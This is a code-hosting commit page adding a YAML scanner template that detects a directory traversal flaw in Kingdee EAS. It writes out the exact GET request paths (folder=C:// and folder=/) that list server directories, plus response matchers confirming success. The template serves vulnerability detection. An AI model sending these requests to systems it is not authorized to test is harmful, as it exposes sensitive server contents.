Merge pull request #4055 from ritikchaddha/patch-5
Create kingdee-eas-directory-traversal.yamlpatch-1
commit
3b767cd5b6
|
@ -0,0 +1,35 @@
|
|||
id: kingdee-eas-directory-traversal
|
||||
|
||||
info:
|
||||
name: Kingdee EAS - Directory Traversal
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: Kingdee OA server_file has a directory traversal vulnerability, attackers can obtain sensitive server information through directory traversal.
|
||||
reference:
|
||||
- https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
|
||||
tags: kingdee,lfi,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=C://&suffix="
|
||||
- "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=/&suffix="
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '{"name":"Windows","path":"C:\\\\Windows","folder":true}'
|
||||
- '{"name":"root","path":"/root","folder":true}'
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue